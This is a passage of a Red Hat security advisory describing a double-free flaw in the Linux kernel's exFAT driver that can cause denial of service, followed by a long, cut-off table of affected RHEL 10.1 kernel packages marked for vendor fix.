"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service"
}
]
}
RHSA-2026:3275
Vulnerability from csaf_redhat - Published: 2026-02-25 02:10 - Updated: 2026-04-24 01:29A flaw was found in the Linux kernel's exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
